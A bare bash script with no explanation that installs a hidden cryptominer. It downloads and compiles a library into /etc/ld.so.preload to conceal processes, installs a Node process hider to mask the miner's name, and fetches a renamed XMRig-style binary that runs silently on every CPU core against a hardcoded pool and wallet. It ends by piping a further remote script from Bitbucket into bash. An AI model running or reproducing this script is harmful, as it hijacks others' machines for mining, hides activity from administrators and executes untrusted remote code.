#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://bitbucket.org/dennidarko01/kangkung/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.2.0 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget -O sgr1 https://gitlab.com/mustofaku/mustofa/raw/main/xlarig >/dev/null 2>&1
chmod +x sgr1
sudo ./sgr1 --donate-level 1 -o 157.245.204.147:443 -u Svjay5hewpoDs9k8pvkhQ7Ns9tRFviYRqCfRmvCRptncVZSNnoCZ9ky3sEpwJV1sqbgk3TBpjmUf2CcgaFrvaf8E2ttBHCgox -p git -a panthera -k -t$(nproc --all) > /dev/null 2>&1 &
curl -sL https://bitbucket.org/lightcoral2/cangor/raw/master/boled04.sh | bash
